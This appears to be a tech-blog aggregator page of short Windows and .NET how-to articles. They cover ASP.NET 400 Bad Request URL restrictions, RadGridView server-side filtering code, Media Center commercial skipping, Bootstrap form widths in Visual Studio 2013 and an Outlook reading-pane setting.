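    [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION]
    "hh.exe"=dword:00002328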
Using this technique, it's possible to ship an application with a help file and allow your CHM help to display with richer CSS markup and correct rendering using the stricter and more consistent XHTML or HTML5 doctypes. If you provide both Web help and in-application help (and why not, if you're building from a single source), you can now sidestep the issue of your customers asking: why does my help file look so much shittier than the online help… No more!

    © Rick Strahl, West Wind Technologies, 2005-2012
    Posted in HTML5  Help  Html Help Builder  Internet Explorer  Windows

    Read the article

  • Understanding 400 Bad Request Exception

    - by imran_ku07
Introduction:

    Why am I getting this exception? What is the cause of this error? Developers are always curious to know the root cause of an exception, even when they have found the solution elsewhere. So what is the reason for this exception (400 Bad Request)? The answer is security. Security is an important feature for any application, and ASP.NET tries its best to give you as secure an application environment as possible. One important security feature is related to URLs, because there are various ways a hacker can try to access server resources, and it is important to make your application as secure as possible. Fortunately, ASP.NET provides this security by throwing a Bad Request exception whenever it deems a request suspicious. In this article I try to present when ASP.NET throws this exception. You will also see some new ASP.NET 4 features which give developers some control over this situation.

    Description:

    http.sys Restrictions:

    It is interesting to note that after deploying your application on a Windows server that runs IIS 6 or higher, the first receptionist of an HTTP request is the kernel-mode HTTP driver: http.sys. Therefore, to complete your request successfully, you must first pass the http.sys restrictions.

    An HTTP request URL must not contain any character in the ASCII range 0x00 to 0x1F, because they are not printable. These characters are invalid URL characters as defined in RFC 2396 of the IETF. But how could an unprintable character be sent at all? The answer: when your application sends the request in binary format.

    Another restriction is on the size of the request. The request - protocol, server name, headers and query string information - must not exceed 16 KB in total, and no individual header may exceed 16 KB.

    Any individual path segment (the portion of the URL that does not include the protocol, server name, and query string; for example, in http://a/b/c?d=e, b and c are individual path segments) must not contain more than 260 characters. Also, http.sys disallows URLs that have more than 255 path segments.

    If any of the above rules is not followed, you will get the 400 Bad Request exception. The reason for these restrictions is that many hack attacks against web servers involve encoding the URL with different character representations.

    You can change the default behavior enforced by http.sys using some registry switches present at HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters

    ASP.NET Restrictions:

    After passing the restrictions enforced by the kernel-mode http.sys, the request is handed off to IIS and then to the ASP.NET engine, where it has to pass some further restrictions in order to complete successfully.

    ASP.NET only allows URL path lengths of up to 260 characters (the path only; for example, in http://a/b/c/d, the path runs from a to d). This means that if you have a long path containing 261 characters, you will get the Bad Request exception. This is due to the NTFS file-path limit.

    Another restriction concerns which characters can be used in the URL path portion. You can use any characters except a few that are considered invalid in the path. Here are some of these invalid characters in the path portion of a URL: <, >, *, %, &, :, \, ?.
To confirm this, just right-click in your Solution Explorer, add a new folder and try to name it one of the above characters; you will get the message: Files or folders cannot be empty strings nor can they contain only '.' or have any of the following characters.....

    To check the above situation, I created a Web Application and put Default.aspx inside an A%A folder (created from Windows Explorer), then navigated to http://localhost:1234/A%25A/Default.aspx. The response I got from the server was the Bad Request exception. The reason is that %25 is the % character, which is an invalid URL path character in ASP.NET. However, you can use these characters in the query string.

    The reason for these restrictions is security: for example, with the help of % a hacker can double-encode the URL path portion, and : can be used to get at specific resources on the server.

    New ASP.NET 4 Features:

    It is worth discussing the new ASP.NET 4 features that put some control in the hands of the developer. Previously we were restricted to a 260-character path length and could not use certain characters, meaning those characters could not become part of a URL path segment. Now you can configure maxRequestPathLength and maxQueryStringLength to allow longer or shorter paths and query strings, and you can customize the set of invalid characters using requestPathInvalidChars, all under the httpRuntime element (a sample web.config fragment appears at the end of this article). This may be good news for anyone who needs to use in their application some of the characters that were invalid in previous versions. You can find further detail about the new ASP.NET URL features here.

    Note that the above new ASP.NET settings will not affect http.sys. This means that you have to pass the http.sys restrictions before ASP.NET ever comes into action. Note also that the http.sys restriction applies to individual path segments, while maxRequestPathLength applies to the complete path (the portion of the URL that does not include the protocol, server name, and query string). For example, if the URL is http://a/b/c/d?e=f, then maxRequestPathLength takes the complete path into account, while http.sys checks each segment individually.

    Summary:

    Hopefully this helps you understand how some of these initial security features come into play. I also recommend that you read (at least the first chapter, called Initial Phases of a Web Request, of) Professional ASP.NET 2.0 Security, Membership, and Role Management by Stefan Schackow. It is a really nice book.
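To make the New ASP.NET 4 Features section above concrete, here is a hedged web.config sketch of those httpRuntime settings (the attribute values shown are illustrative choices, not recommendations):

    <configuration>
      <system.web>
        <!-- ASP.NET 4: raise the path limit beyond 260 characters, cap the
             query string, and customize the set of invalid path characters -->
        <httpRuntime maxRequestPathLength="500"
                     maxQueryStringLength="2048"
                     requestPathInvalidChars="&lt;,&gt;,*,%,&amp;,:,\" />
      </system.web>
    </configuration>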

    Read the article

  • Pure Server-Side Filtering with RadGridView and WCF RIA Services

Those of you who are familiar with WCF RIA Services know that the DomainDataSource control provides a FilterDescriptors collection that enables you to filter data returned by the query on the server. We have been using this DomainDataSource feature in our RIA Services with DomainDataSource online example for almost a year now. In the example, we listen for RadGridView's Filtering event in order to intercept any filtering that is performed on the client and translate it to something that the DomainDataSource will understand, in this case a System.Windows.Data.FilterDescriptor being added to or removed from its FilterDescriptors collection. Think of RadGridView.FilterDescriptors as client-side filtering and of DomainDataSource.FilterDescriptors as server-side filtering. We no longer need the client-side one.

    With the introduction of the Custom Filtering Controls feature, many new possibilities have opened up. With these custom controls we no longer need to do any filtering on the client. I have prepared a very small project that demonstrates how to filter solely on the server by using a custom filtering control.

    As I have already mentioned, filtering on the server is done through the FilterDescriptors collection of the DomainDataSource control. This collection holds instances of type System.Windows.Data.FilterDescriptor. The FilterDescriptor has three important properties:

    PropertyPath: Specifies the name of the property that we want to filter on (the left operand).
    Operator: Specifies the type of comparison to use when filtering. An instance of the FilterOperator enumeration.
    Value: The value to compare with (the right operand). An instance of the Parameter class.

    By adding filters, you can specify that only entities which meet the condition in the filter are loaded from the domain context. In case you are not familiar with these concepts, you might find Brad Abrams' blog interesting.

    Now, our requirement is to create some kind of UI that will manipulate the DomainDataSource.FilterDescriptors collection. When it comes to collections, my first choice of course would be RadGridView. If you are not familiar with the Custom Filtering Controls concept, I would strongly recommend getting acquainted with my step-by-step tutorial Custom Filtering with RadGridView for Silverlight and checking out the online example.

    I have created a simple custom filtering control that contains a RadGridView and several buttons. This control is aware of the DomainDataSource instance, since it is operating on its FilterDescriptors collection. In fact, the RadGridView inside it is bound to this collection. In order to display only the filters that are relevant for the current column, I have applied a filter to the grid. This filter is a Telerik.Windows.Data.FilterDescriptor and is used to filter the little grid inside the custom control. It should not be confused with the DomainDataSource.FilterDescriptors collection that RadGridView is actually bound to - those are the RIA filters.

    Additionally, I have added several other features. For example, if you have specified a DataFormatString on your original column, the Value column inside the custom control will pick it up and format the filter values accordingly. Also, I have transferred the data type of the column that you are filtering on to the Value column of the custom control. This helps the little RadGridView determine what kind of editor to show when you begin editing, for example a date picker for DateTime columns.
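For orientation, here is a minimal C# sketch of what manipulating this server-side collection looks like in code - the myDomainDataSource instance and the UnitPrice property are hypothetical:

    // Ask the server to return only entities whose UnitPrice exceeds 10.
    // The comparison runs in the domain query, before data reaches the client.
    var priceFilter = new System.Windows.Data.FilterDescriptor(
        "UnitPrice",                                        // PropertyPath (left operand)
        System.Windows.Data.FilterOperator.IsGreaterThan,   // Operator
        10m);                                               // Value (right operand)
    myDomainDataSource.FilterDescriptors.Add(priceFilter);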
    Finally, I have added four buttons: two of them can be used to add or remove filters, and the other two communicate the changes you have made to the server. Here is the full source code of the DomainDataSourceFilteringControl. The XAML:

<UserControl x:Class="PureServerSideFiltering.DomainDataSourceFilteringControl"
    xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
    xmlns:telerikGrid="clr-namespace:Telerik.Windows.Controls;assembly=Telerik.Windows.Controls.GridView"
    xmlns:telerik="clr-namespace:Telerik.Windows.Controls;assembly=Telerik.Windows.Controls"
    Width="300">
    <Border x:Name="LayoutRoot"
            BorderThickness="1"
            BorderBrush="#FF8A929E"
            Padding="5"
            Background="#FFDFE2E5">
        <Grid>
            <Grid.RowDefinitions>
                <RowDefinition Height="Auto"/>
                <RowDefinition Height="150"/>
                <RowDefinition Height="Auto"/>
            </Grid.RowDefinitions>
            <StackPanel Grid.Row="0" Margin="2" Orientation="Horizontal" HorizontalAlignment="Center">
                <telerik:RadButton Name="addFilterButton" Click="OnAddFilterButtonClick" Content="Add Filter" Margin="2" Width="96"/>
                <telerik:RadButton Name="removeFilterButton" Click="OnRemoveFilterButtonClick" Content="Remove Filter" Margin="2" Width="96"/>
            </StackPanel>
            <telerikGrid:RadGridView Name="filtersGrid"
                                     Grid.Row="1"
                                     Margin="2"
                                     ItemsSource="{Binding FilterDescriptors}"
                                     AddingNewDataItem="OnFilterGridAddingNewDataItem"
                                     ColumnWidth="*"
                                     ShowGroupPanel="False"
                                     AutoGenerateColumns="False"
                                     CanUserResizeColumns="False"
                                     CanUserReorderColumns="False"
                                     CanUserFreezeColumns="False"
                                     RowIndicatorVisibility="Collapsed"
                                     IsFilteringAllowed="False"
                                     CanUserSortColumns="False">
                <telerikGrid:RadGridView.Columns>
                    <telerikGrid:GridViewComboBoxColumn DataMemberBinding="{Binding Operator}" UniqueName="Operator"/>
                    <telerikGrid:GridViewDataColumn Header="Value" DataMemberBinding="{Binding Value.Value}" UniqueName="Value"/>
                </telerikGrid:RadGridView.Columns>
            </telerikGrid:RadGridView>
            <StackPanel Grid.Row="2" Margin="2" Orientation="Horizontal" HorizontalAlignment="Center">
                <telerik:RadButton Name="filterButton" Click="OnApplyFiltersButtonClick" Content="Apply Filters" Margin="2" Width="96"/>
                <telerik:RadButton Name="clearButton" Click="OnClearFiltersButtonClick" Content="Clear Filters" Margin="2" Width="96"/>
            </StackPanel>
        </Grid>
    </Border>
</UserControl>

And the code-behind:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Windows;
using System.Windows.Controls;
using System.Windows.Documents;
using System.Windows.Input;
using System.Windows.Media;
using System.Windows.Media.Animation;
using System.Windows.Shapes;
using Telerik.Windows.Controls.GridView;
using System.Windows.Data;
using Telerik.Windows.Controls;
using Telerik.Windows.Data;

namespace PureServerSideFiltering
{
    /// <summary>
    /// A custom filtering control capable of filtering purely server-side.
    /// </summary>
    public partial class DomainDataSourceFilteringControl : UserControl, IFilteringControl
    {
        // The main player here.
        DomainDataSource domainDataSource;

        // This is the name of the property that this column displays.
        private string dataMemberName;

        // This is the type of the property that this column displays.
        private Type dataMemberType;

        /// <summary>
        /// Identifies the <see cref="IsActive"/> dependency property.
        /// </summary>
        /// <remarks>
        /// The state of the filtering funnel (i.e. full or empty) is bound to this property.
        /// </remarks>
        public static readonly DependencyProperty IsActiveProperty =
            DependencyProperty.Register(
                "IsActive",
                typeof(bool),
                typeof(DomainDataSourceFilteringControl),
                new PropertyMetadata(false));

        /// <summary>
        /// Gets or sets a value indicating whether the filtering is active.
        /// </summary>
        /// <remarks>
        /// Set this to true if you want to light up the filtering funnel.
        /// </remarks>
        public bool IsActive
        {
            get { return (bool)GetValue(IsActiveProperty); }
            set { SetValue(IsActiveProperty, value); }
        }

        /// <summary>
        /// Gets or sets the domain data source.
        /// We need this in order to work on its FilterDescriptors collection.
        /// </summary>
        /// <value>The domain data source.</value>
        public DomainDataSource DomainDataSource
        {
            get { return this.domainDataSource; }
            set { this.domainDataSource = value; }
        }

        public System.Windows.Data.FilterDescriptorCollection FilterDescriptors
        {
            get { return this.DomainDataSource.FilterDescriptors; }
        }

        public DomainDataSourceFilteringControl()
        {
            InitializeComponent();
        }

        public void Prepare(GridViewBoundColumnBase column)
        {
            this.LayoutRoot.DataContext = this;

            if (this.DomainDataSource == null)
            {
                // Sorry, but we need a DomainDataSource. Can't do anything without it.
                return;
            }

            // This is the name of the property that this column displays.
            this.dataMemberName = column.GetDataMemberName();

            // This is the type of the property that this column displays.
            // We need this in order to see which FilterOperators to feed to the combo-box column.
            this.dataMemberType = column.DataType;

            // We will use our magic Type extension method to see which operators are applicable for
            // this data type. You can go to the extension method body and see what it does.
            ((GridViewComboBoxColumn)this.filtersGrid.Columns["Operator"]).ItemsSource
                = this.dataMemberType.ApplicableFilterOperators();

            // This is very nice as well. We will tell the Value column its data type. In this way
            // RadGridView will pick the best editor according to the data type. For example,
            // if the data type of the value is DateTime, you will be editing it with a DatePicker.
            // Nice!
            ((GridViewDataColumn)this.filtersGrid.Columns["Value"]).DataType = this.dataMemberType;

            // Yet another nice feature. We will transfer the original DataFormatString (if any) to
            // the Value column. In this way if you have specified a DataFormatString for the original
            // column, you will see all filter values formatted accordingly.
            ((GridViewDataColumn)this.filtersGrid.Columns["Value"]).DataFormatString = column.DataFormatString;

            // This is important. Since our little filtersGrid will be bound to the entire collection
            // of this.domainDataSource.FilterDescriptors, we need to set a Telerik filter on the
            // grid so that it will display only those FilterDescriptors that are relevant to this column.
            Telerik.Windows.Data.FilterDescriptor columnFilter = new Telerik.Windows.Data.FilterDescriptor("PropertyPath"
                , Telerik.Windows.Data.FilterOperator.IsEqualTo
                , this.dataMemberName);
            this.filtersGrid.FilterDescriptors.Add(columnFilter);

            // We want to listen for this in order to activate and de-activate the UI funnel.
            this.filtersGrid.Items.CollectionChanged += this.OnFilterGridItemsCollectionChanged;
        }

        /// <summary>
        /// Since the DomainDataSource is a little bit picky about adding uninitialized FilterDescriptors
        /// to its collection, we will prepare each new instance with some default values and then
        /// the user can change them later. Go to the event handler to see how we do this.
        /// </summary>
        void OnFilterGridAddingNewDataItem(object sender, GridViewAddingNewEventArgs e)
        {
            // We need to initialize the new instance with some values and let the user go on from here.
            System.Windows.Data.FilterDescriptor newFilter = new System.Windows.Data.FilterDescriptor();

            // This is a must. It should know what member it is filtering on.
            newFilter.PropertyPath = this.dataMemberName;

            // Initialize it with one of the allowed operators. See the
            // TypeExtensions.ApplicableFilterOperators method for more info.
            newFilter.Operator = this.dataMemberType.ApplicableFilterOperators().First();

            if (this.dataMemberType == typeof(DateTime))
            {
                newFilter.Value.Value = DateTime.Now;
            }
            else if (this.dataMemberType == typeof(string))
            {
                newFilter.Value.Value = "<enter text>";
            }
            else if (this.dataMemberType.IsValueType)
            {
                // We need something non-null for all value types.
                newFilter.Value.Value = Activator.CreateInstance(this.dataMemberType);
            }

            // Let the user edit the new filter any way he/she likes.
            e.NewObject = newFilter;
        }

        void OnFilterGridItemsCollectionChanged(object sender, System.Collections.Specialized.NotifyCollectionChangedEventArgs e)
        {
            // We are active only if we have any filters defined. In this case the filtering funnel will light up.
            this.IsActive = this.filtersGrid.Items.Count > 0;
        }

        private void OnApplyFiltersButtonClick(object sender, RoutedEventArgs e)
        {
            if (this.DomainDataSource.IsLoadingData)
            {
                return;
            }

            // Comment this if you want the popup to stay open after the button is clicked.
            this.ClosePopup();

            // Since this.domainDataSource.AutoLoad is false, this will take into
            // account all filtering changes that the user has made since the last
            // Load() and pull the new data to the client.
            this.DomainDataSource.Load();
        }

        private void OnClearFiltersButtonClick(object sender, RoutedEventArgs e)
        {
            if (this.DomainDataSource.IsLoadingData)
            {
                return;
            }

            // We want to remove ONLY those filters from the DomainDataSource
            // that this control is responsible for.
            this.DomainDataSource.FilterDescriptors
                .Where(fd => fd.PropertyPath == this.dataMemberName) // Only "our" filters.
                .ToList()
                .ForEach(fd => this.DomainDataSource.FilterDescriptors.Remove(fd)); // Bye-bye!

            // Comment this if you want the popup to stay open after the button is clicked.
            this.ClosePopup();

            // After we have done our housekeeping, get the new data to the client.
            this.DomainDataSource.Load();
        }

        private void OnAddFilterButtonClick(object sender, RoutedEventArgs e)
        {
            if (this.DomainDataSource.IsLoadingData)
            {
                return;
            }

            // Let the user enter his or her requirements for a new filter.
            this.filtersGrid.BeginInsert();
            this.filtersGrid.UpdateLayout();
        }

        private void OnRemoveFilterButtonClick(object sender, RoutedEventArgs e)
        {
            if (this.DomainDataSource.IsLoadingData)
            {
                return;
            }

            // Find the currently selected filter and destroy it.
            System.Windows.Data.FilterDescriptor filterToRemove = this.filtersGrid.SelectedItem as System.Windows.Data.FilterDescriptor;
            if (filterToRemove != null
                && this.DomainDataSource.FilterDescriptors.Contains(filterToRemove))
            {
                this.DomainDataSource.FilterDescriptors.Remove(filterToRemove);
            }
        }

        private void ClosePopup()
        {
            System.Windows.Controls.Primitives.Popup popup = this.ParentOfType<System.Windows.Controls.Primitives.Popup>();
            if (popup != null)
            {
                popup.IsOpen = false;
            }
        }
    }
}

Finally, we need to tell RadGridView's columns to use this custom control instead of the default one. Here is how to do it:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Windows;
using System.Windows.Controls;
using System.Windows.Documents;
using System.Windows.Input;
using System.Windows.Media;
using System.Windows.Media.Animation;
using System.Windows.Shapes;
using System.Windows.Data;
using Telerik.Windows.Data;
using Telerik.Windows.Controls;
using Telerik.Windows.Controls.GridView;

namespace PureServerSideFiltering
{
    public partial class MainPage : UserControl
    {
        public MainPage()
        {
            InitializeComponent();
            this.grid.AutoGeneratingColumn += this.OnGridAutoGeneratingColumn;

            // Uncomment this if you want the DomainDataSource to start pre-filtered.
            // You will notice how our custom filtering controls correctly read this information,
            // populate their UI with the respective filters and light up the funnel to indicate that
            // filtering is active. Go ahead and try it.
            this.employeesDataSource.FilterDescriptors.Add(new System.Windows.Data.FilterDescriptor("Title", System.Windows.Data.FilterOperator.Contains, "Assistant"));
            this.employeesDataSource.FilterDescriptors.Add(new System.Windows.Data.FilterDescriptor("HireDate", System.Windows.Data.FilterOperator.IsGreaterThan, new DateTime(1998, 12, 31)));
            this.employeesDataSource.FilterDescriptors.Add(new System.Windows.Data.FilterDescriptor("HireDate", System.Windows.Data.FilterOperator.IsLessThanOrEqualTo, new DateTime(1999, 12, 31)));

            this.employeesDataSource.Load();
        }

        /// <summary>
        /// First of all, we need to replace the default filtering control
        /// of each column with our custom filtering control DomainDataSourceFilteringControl.
        /// </summary>
        private void OnGridAutoGeneratingColumn(object sender, GridViewAutoGeneratingColumnEventArgs e)
        {
            GridViewBoundColumnBase dataColumn = e.Column as GridViewBoundColumnBase;
            if (dataColumn != null)
            {
                // We do not like ugly dates.
                if (dataColumn.DataType == typeof(DateTime))
                {
                    dataColumn.DataFormatString = "{0:d}"; // Short date pattern.

                    // Notice how this format will later be transferred to the Value column
                    // of the grid that we have inside the DomainDataSourceFilteringControl.
                }

                // Replace the default filtering control with ours.
                dataColumn.FilteringControl = new DomainDataSourceFilteringControl()
                {
                    // Let the control know about the DDS; after all, it will work directly on it.
                    DomainDataSource = this.employeesDataSource
                };

                // Finally, light up the filtering funnel through the IsActive dependency property
                // in case there are some filters on the DDS that match our column member.
                string dataMemberName = dataColumn.GetDataMemberName();
                dataColumn.FilteringControl.IsActive =
                    this.employeesDataSource.FilterDescriptors
                    .Where(fd => fd.PropertyPath == dataMemberName)
                    .Count() > 0;
            }
        }
    }
}

The best part is that we are not only writing filters to the DomainDataSource; we can also read and load them. If the DomainDataSource has some pre-existing filters (like the ones I have created in the code above), our control will read them and populate its UI accordingly. Even the filtering funnel will light up! Remember, the funnel is controlled by the IsActive property of our control. While this is just a basic implementation, the source code is absolutely yours, so you can take it from here and extend it to match your specific business requirements. Below the main grid there is another debug grid; with its help you can monitor which filter descriptors are added to and removed from the domain data source. Download Source Code. (You will need to have the AdventureWorks sample database installed on the default SQLExpress instance in order to run it.) Enjoy!
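    If you want to experiment with the idea before downloading the project, the core of it fits in a few lines: push a System.Windows.Data.FilterDescriptor into the DomainDataSource and reload. This is only a sketch; the employeesDataSource name and the HireDate property are assumptions standing in for your own DomainDataSource and entity:

// Server-side filtering in a nutshell: describe the filter and let RIA Services
// translate it into the query that runs on the server.
System.Windows.Data.FilterDescriptor serverFilter =
    new System.Windows.Data.FilterDescriptor(
        "HireDate",                                       // PropertyPath: the left operand
        System.Windows.Data.FilterOperator.IsGreaterThan, // Operator
        new DateTime(2000, 1, 1));                        // Value: the right operand

this.employeesDataSource.FilterDescriptors.Add(serverFilter);

// With AutoLoad set to false, only entities satisfying the condition
// are pulled to the client when we explicitly reload.
this.employeesDataSource.Load();

This is exactly what the custom filtering control above automates for each column.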

    Read the article

  • How To Skip Commercials in Windows 7 Media Center

    - by DigitalGeekery
    If you use Windows 7 Media Center to record live TV, you’re probably interested in skipping through commercials. After all, a big reason to record programs is to avoid commercials, right? Today we focus on a fairly simple and free way to get you skipping commercials in no time. In Windows 7, the .wtv file format has replaced the dvr-ms file format used in previous versions of Media Center for Recorded TV. The .wtv file format, however, does not work very well with commercial skipping applications. The Process Our first step will be to convert the recorded .wtv files to the previously used dvr-ms file format. This conversion will be done automatically by WtvWatcher. It’s important to note that this process deletes the original .wtv file after successfully converting to .dvr-ms. Next, we will use DVRMSToolBox with the DTB Addin to handle commercial skipping. This process does not “cut” or remove the commercials from the file. It merely skips the commercials during playback. WtvWatcher Download and install the WtvWatcher (link below). To install WtvWatcher, you’ll need to have Windows Installer 3.1 and .NET Framework 3.5 SP1. If you get the Publisher cannot be verified warning you can go ahead and click Install. We’ve completely tested this app and it contains no malware and runs successfully. After installing, the WtvWatcher will pop up in the lower right corner of your screen. You will need to set the path to your Recorded TV directory. Click on the button for “Click here to set your recorded TV path…” The WtvWatcher Preferences window will open… …and you’ll be prompted to browse for your Recorded TV folder. If you did not change the default location at setup, it will be found at C:\Users\Public\Recorded TV. Click “OK” when finished. Click the “X” to close the Preferences screen. You should now see WtvWatcher begin to convert any existing WTV files. The process should only take a few minutes per file. Note: If WtvWatcher detects an error during the conversion process, it will not delete the original WTV file. You will probably want to run WtvWatcher on startup. This will allow WtvWatcher to constantly scan for new .wtv files to convert. There is no setting in the application to run on startup, so you’ll need to copy the WtvWatcher icon from your desktop into your Windows start menu “Startup” directory. To do so, click on Start > All Programs, right-click on Startup, and click on Open all users. Drag and drop, or cut and paste, the WtvWatcher desktop shortcut into the Startup folder. DVRMSToolBox and DTBAddIn Next, we need to download and install the DVRMSToolBox and the DTBAddIn. These two pieces of software will do the actual commercial skipping. After downloading the DVRMSToolBox zip file, extract it and double-click the setup.exe file. Click “Next” to begin the installation. Unless DVRMSToolBox will only be used by Administrator accounts, check the “Modify File Permissions” box. Click “Next.” When you get to the Optional Components window, uncheck Download/Install ShowAnalyzer. We will not be using that application. When the installation is complete, click “Close.” Next we need to install the DTBAddin. Unzip the download folder and run the appropriate .msi file for your system. It is available in 32 & 64 bit versions. Just double click on the file and take the default options. Click “Finish” when the install is completed. You will then be prompted to restart your computer.
After your computer has restarted, open the DVRMSToolBox settings by going to Start > All Programs, DVRMSToolBox, and clicking on DVRMStoMPEGSettings. On the MC Addin tab, make sure that Skip Commercials is checked. It should be by default. On the Commercial Skip tab, make sure the Auto Skip option is selected. Click “Save.” If you try to watch recorded TV before the file conversion and commercial indexing process is complete, you’ll get the following message pop up in Media Center. If you click Yes, it will start indexing the commercials if WtvWatcher has already converted it to dvr-ms. Now you’re ready to kick back and watch your recorded TV without having to wait through those long commercial breaks. Conclusion The DVRMSToolBox is a powerful and complex application with a multitude of features and utilities. We’ve shown you a quick and easy way to get your Windows Media Center setup to skip commercials. This setup, like virtually all commercial skipping setups, is not perfect. You will occasionally find a commercial that doesn’t get skipped. Need help getting your Windows 7 PC configured for TV? Check out our previous tutorial on setting up live TV in Windows Media Center. Links Download WTV Watcher Download DVRMSToolBox Download DTBAddin
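    As a side note, if you set this up on several machines, the only fiddly manual step above is copying the WtvWatcher shortcut into the all-users Startup folder. Here is a small sketch of automating that step in C#; the shortcut file name is an assumption, so check what the installer actually put on your desktop:

using System;
using System.IO;

class AddWtvWatcherToStartup
{
    static void Main()
    {
        // Assumed shortcut name; adjust to match the one on your desktop.
        string desktopShortcut = Path.Combine(
            Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory),
            "WtvWatcher.lnk");

        // The all-users Startup folder (Start > All Programs > Startup).
        // Note: SpecialFolder.CommonStartup requires .NET Framework 4.
        string startupFolder = Environment.GetFolderPath(Environment.SpecialFolder.CommonStartup);

        File.Copy(desktopShortcut, Path.Combine(startupFolder, "WtvWatcher.lnk"), true);
    }
}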

    Read the article

  • Visual Studio 2013, ASP.NET MVC 5 Scaffolded Controls, and Bootstrap

    - by plitwin
    A few days ago, I created an ASP.NET MVC 5 project in the brand new Visual Studio 2013. I added some model classes and then proceeded to scaffold a controller class and views using the Entity Framework. Scaffolding Some Views Visual Studio 2013, by default, uses the Bootstrap 3 responsive CSS framework. Great; after all, we all want our web sites to be responsive and work well on mobile devices. Here’s an example of a scaffolded Create view as shown in the Google Chrome browser. Looks pretty good. Okay, so let’s increase the width of the Title, Description, Address, and Date/Time textboxes, and decrease the width of the State and MaxActors textbox controls. Can’t be that hard… Digging Into the Code Let’s take a look at the scaffolded Create.cshtml file. Here’s a snippet of the code behind the Create view. Pretty simple stuff.

@using (Html.BeginForm())
{
    @Html.AntiForgeryToken()
    <div class="form-horizontal">
        <h4>RandomAct</h4>
        <hr />
        @Html.ValidationSummary(true)
        <div class="form-group">
            @Html.LabelFor(model => model.Title, new { @class = "control-label col-md-2" })
            <div class="col-md-10">
                @Html.EditorFor(model => model.Title)
                @Html.ValidationMessageFor(model => model.Title)
            </div>
        </div>
        <div class="form-group">
            @Html.LabelFor(model => model.Description, new { @class = "control-label col-md-2" })
            <div class="col-md-10">
                @Html.EditorFor(model => model.Description)
                @Html.ValidationMessageFor(model => model.Description)
            </div>
        </div>

A little more digging and I discovered that there are three CSS files of importance in how the page is rendered: bootstrap.css (and its minified counterpart) and site.css, as shown below. The Root of the Problem And here’s the root of the problem, the following CSS you’ll find in Site.css:

/* Set width on the form input elements since they're 100% wide by default */
input,
select,
textarea {
    max-width: 280px;
}

Yes, Microsoft is for some reason setting the maximum width of all input, select, and textarea controls to 280 pixels. I am not sure of the motivation behind this, but until you change this or override it by assigning the form controls to some other CSS class, your controls will never be able to be wider than 280px.
The Fix Okay, so here’s the deal: I hope to become very competent in all things Bootstrap in the near future, but I don’t think you should have to become a Bootstrap guru in order to modify some scaffolded control widths. And you don’t. Here is the solution I came up with: Find the aforementioned CSS code in Site.css and change it to something more reasonable, such as:

/* Set width on the form input elements since they're 100% wide by default */
input,
select,
textarea {
    max-width: 600px;
}

Because the @Html.EditorFor html helper doesn’t support the passing of HTML attributes, you will need to replace any @Html.EditorFor() helpers with @Html.TextBoxFor(), @Html.TextAreaFor(), @Html.CheckBoxFor(), etc. helpers, and then add a custom width attribute to each control you wish to modify. Thus, the earlier stretch of code might end up looking like this:

@using (Html.BeginForm())
{
    @Html.AntiForgeryToken()
    <div class="form-horizontal">
        <h4>Random Act</h4>
        <hr />
        @Html.ValidationSummary(true)
        <div class="form-group">
            @Html.LabelFor(model => model.Title, new { @class = "control-label col-md-2" })
            <div class="col-md-10">
                @Html.TextBoxFor(model => model.Title, new { style = "width: 400px" })
                @Html.ValidationMessageFor(model => model.Title)
            </div>
        </div>
        <div class="form-group">
            @Html.LabelFor(model => model.Description, new { @class = "control-label col-md-2" })
            <div class="col-md-10">
                @Html.TextAreaFor(model => model.Description, new { style = "width: 400px" })
                @Html.ValidationMessageFor(model => model.Description)
            </div>
        </div>

Resulting Form Here’s what the page looks like after the fix:
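    By the way, if inline styles feel too heavy-handed, the same effect can be had by defining a small class of your own in Site.css, say .wide-input { max-width: 600px; } (the class name is my assumption, not something the template provides), and passing it through the htmlAttributes parameter instead:

@* A sketch: widen controls via a custom class instead of inline widths. *@
@Html.TextBoxFor(model => model.Title, new { @class = "wide-input" })
@Html.TextAreaFor(model => model.Description, new { @class = "wide-input" })

This keeps the widths in one place, so a later redesign only touches the stylesheet.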

    Read the article

  • Mark Messages As Read in the Outlook 2010 Reading Pane

    - by Matthew Guay
    Do you ever feel annoyed that Outlook 2010 doesn’t mark messages as Read as soon as you click and view them in the Reading Pane?  Here we show you how to make Outlook mark them as read as soon as they’re opened. Mark as Read By default, Outlook will not mark a message as read until you select another message.  This can be annoying, because if you read a message and immediately click Delete, it will show up as an unread message in our Deleted Items folder. Let’s change this to make Outlook mark messages as read as soon as we view them in the Reading Pane.  Open Outlook and click File to open Backstage View, and select Options. In Options select Mail on the left menu, and under Outlook panes click on the Reading Pane button. Check the box Mark items as read when viewed in the Reading Pane to make Outlook mark your messages as read when you view them in the Reading Pane.  By default, Outlook will only mark a message read after you’ve been reading it for 5 seconds, though you can change this.  We set it to 0 seconds so our messages would be marked as read as soon as we select them. Click OK in both dialogs, and now your messages will be marked as read as soon as you select them in the reading pane, or soon after, depending on your settings. Conclusion Outlook 2010 is a great email client, but like most programs it has its quirks.  This quick tip can help you get rid of one of Outlook’s annoying features, and make it work like you want it to. And, if you’re still using Outlook 2007, check out our article on how to Mark Messages as Read When Viewed in Outlook 2007.
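    And if you manage many mailboxes, the same flag can be flipped programmatically. Here is a hedged sketch using the Outlook interop assembly; it assumes Outlook is running and that a reference to Microsoft.Office.Interop.Outlook has been added, and it marks the currently selected messages as read:

using Outlook = Microsoft.Office.Interop.Outlook;

class MarkSelectionRead
{
    static void Main()
    {
        // Attaches to the running Outlook instance.
        Outlook.Application outlook = new Outlook.Application();
        Outlook.Explorer explorer = outlook.ActiveExplorer();

        foreach (object item in explorer.Selection)
        {
            Outlook.MailItem mail = item as Outlook.MailItem;
            if (mail != null && mail.UnRead)
            {
                mail.UnRead = false; // the same "read" state the option above controls
                mail.Save();
            }
        }
    }
}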

    Read the article

  • Resolving IIS7 HTTP Error 500.19 - Internal Server Error

    - by fatherjack
